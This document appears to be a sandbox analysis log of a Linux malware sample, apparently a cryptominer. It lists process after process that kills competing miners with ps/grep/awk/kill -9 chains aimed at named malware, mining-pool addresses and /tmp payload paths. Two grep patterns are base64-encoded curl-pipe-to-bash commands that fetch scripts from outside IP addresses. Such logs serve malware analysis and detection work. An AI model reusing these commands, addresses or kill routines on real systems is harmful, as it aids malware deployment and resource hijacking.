- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:994
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1002
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1001
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1000
- /bin/grep
  grep -v grep
  2⤵
  PID:999
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:998
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1009
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1008
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1007
- /bin/grep
  grep -v grep
  2⤵
  PID:1006
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1005
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1015
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1016
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1012
- /bin/grep
  grep -v grep
  2⤵
  PID:1013
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1014
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1023
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1022
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1021
- /bin/grep
  grep -v grep
  2⤵
  PID:1020
- /bin/ps
  ps aux
  2⤵
  PID:1019
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1030
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1029
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1028
- /bin/grep
  grep -v grep
  2⤵
  PID:1027
- /bin/ps
  ps aux
  2⤵
  PID:1026
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1036
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1035
- /bin/grep
  grep svc
  2⤵
  PID:1034
- /bin/grep
  grep -v grep
  2⤵
  PID:1033
- /bin/ps
  ps aux
  2⤵
  PID:1032
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1042
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1041
- /bin/grep
  grep -v grep
  2⤵
  PID:1040
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1049
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1048
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1047
- /bin/grep
  grep -v grep
  2⤵
  PID:1046
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1045
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1056
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1055
- /bin/grep
  grep -v grep
  2⤵
  PID:1054
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1057
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1063
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1062
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1061
- /bin/grep
  grep -v grep
  2⤵
  PID:1060
- /bin/ps
  ps aux
  2⤵
  PID:1059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1071
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1070
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1069
- /bin/grep
  grep -v grep
  2⤵
  PID:1068
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1067
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1079
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1078
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1077
- /bin/grep
  grep -v grep
  2⤵
  PID:1076
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1075
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1086
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1085
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1084
- /bin/grep
  grep -v grep
  2⤵
  PID:1083
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1082
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1091
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1090
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1089
- /bin/grep
  grep -v grep
  2⤵
  PID:1088
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1099
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1098
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1097
- /bin/grep
  grep -v grep
  2⤵
  PID:1096
- /bin/ps
  ps aux
  2⤵
  PID:1095
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1103
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1104
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1102
- /bin/grep
  grep -v grep
  2⤵
  PID:1101
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1100
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1110
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1109
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1108
- /bin/grep
  grep -v grep
  2⤵
  PID:1107
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1106
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1116
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1115
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1114
- /bin/grep
  grep -v grep
  2⤵
  PID:1113
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1112
- /bin/grep
  grep -v grep
  2⤵
  PID:1118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1120
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1117
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1119
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1124
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1123
- /bin/grep
  grep -v grep
  2⤵
  PID:1122
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1121
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1125
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1130
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1129
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1128
- /bin/grep
  grep -v grep
  2⤵
  PID:1127
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1126
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1135
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1134
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1133
- /bin/grep
  grep -v grep
  2⤵
  PID:1132
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1131
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1140
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1139
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1138
- /bin/grep
  grep -v grep
  2⤵
  PID:1137
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1136
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1145
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1144
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1143
- /bin/grep
  grep -v grep
  2⤵
  PID:1142
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1141
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1150
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1149
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1148
- /bin/grep
  grep -v grep
  2⤵
  PID:1147
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1146
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1155
- /bin/grep
  grep "]"
  2⤵
  PID:1154
- /bin/grep
  grep -v aux
  2⤵
  PID:1153
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1156
- /bin/grep
  grep -v grep
  2⤵
  PID:1152
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1151
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1159
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1160
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1161
- /bin/grep
  grep -v grep
  2⤵
  PID:1158
- /bin/ps
  ps aux
  2⤵
  PID:1157
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1166
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1165
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1164
- /bin/grep
  grep -v grep
  2⤵
  PID:1163
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1162
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1171
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1170
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1169
- /bin/grep
  grep -v grep
  2⤵
  PID:1168
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1167
- /bin/grep
  grep -v _
  2⤵
  PID:1176
- /bin/grep
  grep -v /
  2⤵
  PID:1174
- /bin/grep
  grep -v -
  2⤵
  PID:1175
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1178
- /bin/grep
  grep -v grep
  2⤵
  PID:1173
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1177
- /bin/ps
  ps aux
  2⤵
  PID:1172
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1183
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1182
- /bin/grep
  grep -v grep
  2⤵
  PID:1180
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1181
- /bin/ps
  ps aux
  2⤵
  PID:1179
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1187
- /bin/grep
  grep rsync
  2⤵
  PID:1186
- /bin/grep
  grep -v grep
  2⤵
  PID:1185
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1184
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1192
- /bin/grep
  grep watchd0g
  2⤵
  PID:1191
- /bin/grep
  grep -v grep
  2⤵
  PID:1190
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1189
- /bin/grep
  grep -v grep
  2⤵
  PID:1195
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1194
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1197
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1198
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1196
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1202
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:1201
- /bin/grep
  grep -v grep
  2⤵
  PID:1200
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1199
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1207
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1206
- /bin/grep
  grep -v grep
  2⤵
  PID:1205
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1213
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1212
- /bin/grep
  grep gitee.com
  2⤵
  PID:1211
- /bin/grep
  grep -v grep
  2⤵
  PID:1210
- /bin/ps
  ps aux
  2⤵
  PID:1209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1218
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1217
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1216
- /bin/grep
  grep -v grep
  2⤵
  PID:1215
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1214
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1223
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1222
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1221
- /bin/grep
  grep -v grep
  2⤵
  PID:1220
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1219
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1228
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1227
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1226
- /bin/grep
  grep -v grep
  2⤵
  PID:1225
- /bin/ps
  ps aux
  2⤵
  PID:1224
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1233
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1232
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1231
- /bin/grep
  grep -v grep
  2⤵
  PID:1230
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1229
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1238
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1237
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1236
- /bin/grep
  grep -v grep
  2⤵
  PID:1235
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1234
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1243
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1242
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1241
- /bin/grep
  grep -v grep
  2⤵
  PID:1240
- /bin/ps
  ps aux
  2⤵
  PID:1239
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1248
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1247
- /bin/grep
  grep netdns
  2⤵
  PID:1246
- /bin/grep
  grep -v grep
  2⤵
  PID:1245
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1244
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1253
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1252
- /bin/grep
  grep watchdogs
  2⤵
  PID:1251
- /bin/grep
  grep -v grep
  2⤵
  PID:1250
- /bin/ps
  ps aux
  2⤵
  PID:1249
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1257
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1256
- /bin/grep
  grep -v grep
  2⤵
  PID:1255
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1254
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1263
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1262
- /bin/grep
  grep kinsing
  2⤵
  PID:1261
- /bin/grep
  grep -v grep
  2⤵
  PID:1260
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1259
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1270
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1269
- /bin/grep
  grep redis2
  2⤵
  PID:1268
- /bin/grep
  grep -v grep
  2⤵
  PID:1267
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1266
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1276
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1275
- /bin/grep
  grep " ps"
  2⤵
  PID:1274
- /bin/grep
  grep -v aux
  2⤵
  PID:1273
- /bin/grep
  grep -v grep
  2⤵
  PID:1272
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1271
- /bin/grep
  grep sync_supers
  2⤵
  PID:1281
- /bin/grep
  grep -v grep
  2⤵
  PID:1280
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1279
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1283
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1282
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1290
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1289
- /bin/grep
  grep cpuset
  2⤵
  PID:1288
- /bin/grep
  grep -v grep
  2⤵
  PID:1287
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1286
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1296
- /bin/grep
  grep "x]"
  2⤵
  PID:1295
- /bin/grep
  grep -v aux
  2⤵
  PID:1294
- /bin/grep
  grep -v grep
  2⤵
  PID:1293
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1292
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1304
- /bin/grep
  grep -v aux
  2⤵
  PID:1302
- /bin/grep
  grep -v grep
  2⤵
  PID:1301
- /bin/ps
  ps aux
  2⤵
  PID:1300
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1303
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1305
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1311
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1306
- /bin/grep
  grep -v aux
  2⤵
  PID:1308
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1310
- /bin/grep
  grep -v grep
  2⤵
  PID:1307
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1309
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1316
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1315
- /bin/grep
  grep -v grep
  2⤵
  PID:1314
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1313
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1324
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1323
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1322
- /bin/grep
  grep -v grep
  2⤵
  PID:1321
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1320
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1331
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1330
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1329
- /bin/grep
  grep -v grep
  2⤵
  PID:1328
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1327
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1336
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1335
- /bin/grep
  grep -v grep
  2⤵
  PID:1334
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1333
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1343
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1341
- /bin/grep
  grep -v grep
  2⤵
  PID:1340
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1342
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1350
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1349
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1348
- /bin/grep
  grep -v grep
  2⤵
  PID:1347
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1346
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1357
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1356
- /bin/grep
  grep -v grep
  2⤵
  PID:1354
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1355
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1353
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1363
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1362
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1361
- /bin/grep
  grep -v grep
  2⤵
  PID:1360
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1359
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1370
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1369
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1368
- /bin/grep
  grep -v grep
  2⤵
  PID:1367
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1366
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1375
- /bin/grep
  grep sustse
  2⤵
  PID:1374
- /bin/grep
  grep -v grep
  2⤵
  PID:1373
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1383
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1382
- /bin/grep
  grep sustse3
  2⤵
  PID:1381
- /bin/grep
  grep -v grep
  2⤵
  PID:1380
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1379
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1391
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1390
- /bin/grep
  grep wget
  2⤵
  PID:1389
- /bin/grep
  grep mr.sh
  2⤵
  PID:1388
- /bin/grep
  grep -v grep
  2⤵
  PID:1387
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1386
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1398
- /bin/grep
  grep curl
  2⤵
  PID:1396
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1397
- /bin/grep
  grep mr.sh
  2⤵
  PID:1395
- /bin/grep
  grep -v grep
  2⤵
  PID:1394
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1393
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1405
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1404
- /bin/grep
  grep wget
  2⤵
  PID:1403
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1402
- /bin/grep
  grep -v grep
  2⤵
  PID:1401
- /bin/ps
  ps aux
  2⤵
  PID:1400
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1411
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1410
- /bin/grep
  grep curl
  2⤵
  PID:1409
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1408
- /bin/grep
  grep -v grep
  2⤵
  PID:1407
- /bin/ps
  ps aux
  2⤵
  PID:1406
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1417
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1416
- /bin/grep
  grep wget
  2⤵
  PID:1415
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1414
- /bin/grep
  grep -v grep
  2⤵
  PID:1413
- /bin/ps
  ps aux
  2⤵
  PID:1412
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1423
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1422
- /bin/grep
  grep curl
  2⤵
  PID:1421
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1420
- /bin/grep
  grep -v grep
  2⤵
  PID:1419
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1418
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1429
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep wget
  2⤵
  PID:1427
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1426
- /bin/grep
  grep -v grep
  2⤵
  PID:1425
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1424
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1435
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1434
- /bin/grep
  grep curl
  2⤵
  PID:1433
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1432
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /bin/ps
  ps aux
  2⤵
  PID:1430
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1440
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1439
- /bin/grep
  grep j2.conf
  2⤵
  PID:1438
- /bin/grep
  grep -v grep
  2⤵
  PID:1437
- /bin/ps
  ps aux
  2⤵
  PID:1436
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1446
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1445
- /bin/grep
  grep wget
  2⤵
  PID:1444
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1443
- /bin/grep
  grep -v grep
  2⤵
  PID:1442
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1441
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1452
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1451
- /bin/grep
  grep curl
  2⤵
  PID:1450
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1449
- /bin/grep
  grep -v grep
  2⤵
  PID:1448
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1447
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1458
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1457
- /bin/grep
  grep wget
  2⤵
  PID:1456
- /bin/grep
  grep ficov
  2⤵
  PID:1455
- /bin/grep
  grep -v grep
  2⤵
  PID:1454
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1453
